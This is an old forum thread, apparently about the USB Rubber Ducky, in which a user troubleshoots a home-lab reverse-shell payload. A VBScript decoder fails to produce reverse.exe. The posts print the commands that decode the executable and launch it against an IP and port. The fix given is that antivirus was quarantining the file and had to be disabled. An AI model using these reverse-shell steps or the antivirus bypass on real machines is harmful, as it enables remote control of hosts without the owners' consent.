BGPv5 Posted December 22, 2011 Share Posted December 22, 2011 Hello all, I am now trying to play in my home lab with the reverse shell and running into a slight issue with reverse.exe not being created. I get the following after compilation: 1 file(s) copied. C:\Windows\system32>cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. C:\Windows\system32>c:\reverse.exe 192.168.32.190 8080 'c:\reverse.exe' is not recognized as an internal or external command, operable program or batch file. Version of cscript seems to be 5.8 C:\Windows\system32>cscript Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. Usage: CScript scriptname.extension [option...] [arguments...] The decoder.vbs and reverse.txt are there, but no reverse.exe. I am using the same example from the wiki with the addition of the STRING_DELAY and compiled online. every other aspect appears to work as expected. Can someone give me a pointer (if I missing on the wiki, please just point to the thread and I will follow) If you need more info - let me know.... Kind Regards Quote Link to comment Share on other sites More sharing options...
PineDominator Posted December 23, 2011 Share Posted December 23, 2011 Hello all, I am now trying to play in my home lab with the reverse shell and running into a slight issue with reverse.exe not being created. I get the following after compilation: 1 file(s) copied. C:\Windows\system32>cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. C:\Windows\system32>c:\reverse.exe 192.168.32.190 8080 'c:\reverse.exe' is not recognized as an internal or external command, operable program or batch file. Version of cscript seems to be 5.8 C:\Windows\system32>cscript Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. Usage: CScript scriptname.extension [option...] [arguments...] The decoder.vbs and reverse.txt are there, but no reverse.exe. I am using the same example from the wiki with the addition of the STRING_DELAY and compiled online. every other aspect appears to work as expected. Can someone give me a pointer (if I missing on the wiki, please just point to the thread and I will follow) If you need more info - let me know.... Kind Regards I had a sim problem, It was solved by deleting decoder.vbs and reverse.txt somehow it needs to be created every time Quote Link to comment Share on other sites More sharing options...
BGPv5 Posted December 23, 2011 Author Share Posted December 23, 2011 I had a sim problem, It was solved by deleting decoder.vbs and reverse.txt somehow it needs to be created every time I hoped that was the issue also. I deleted them each time I ran it. In addition, I renamed the reverse.exe to other names and extensions to see if that gave a hint. The last option I tried was saving to other directories and\or drives. This was in hopes to get the reverse.exe. I'm guessing, but it seems like cscript is not compiling/creating the executable. Here I just went to a cmd prompt to have script make anything from a removable drive(not the ducky): D:\>dir Volume in drive D has no label. Volume Serial Number is 6662-3931 Directory of D:\ 02/24/2011 01:51 PM <DIR> DCIM 02/24/2011 01:51 PM <DIR> MISC 12/23/2011 07:14 AM 452 decoder.vbs 12/23/2011 07:14 AM 1,732 reverse.txt 2 File(s) 2,184 bytes 2 Dir(s) 7,938,441,216 bytes free D:\>cscript decoder.vbs reverse.txt reverse.exe Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. D:\>dir Volume in drive D has no label. Volume Serial Number is 6662-3931 Directory of D:\ 02/24/2011 01:51 PM <DIR> DCIM 02/24/2011 01:51 PM <DIR> MISC 12/23/2011 07:14 AM 452 decoder.vbs 12/23/2011 07:14 AM 1,732 reverse.txt 2 File(s) 2,184 bytes 2 Dir(s) 7,938,441,216 bytes free No reverse.exe I also tried the "//D" option to see if I could get some kind of error report, but nothing. Thanks Quote Link to comment Share on other sites More sharing options...
Solution BGPv5 Posted December 23, 2011 Author Solution Share Posted December 23, 2011 (edited) [sOLVED] 1. No errors gave me a clue something else is preventing it from running, else other would have had the problem. 2. I installed and fired up a Vbox image of XP and Win7 3. Both worked flawlessly 4. Notice my Symantec Endpoint Protection was still running (not in taskbar) on my orig machine *5. Symantec tagged all the files I tried to rename, from reverse.exe to foo.bat as "Suspicious.MLApp" and quarantined. Completely disable it in task manager and wrong as expected now. Hope this helps another noob out there. Thanks for listening :) Edited December 23, 2011 by BGPv5 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.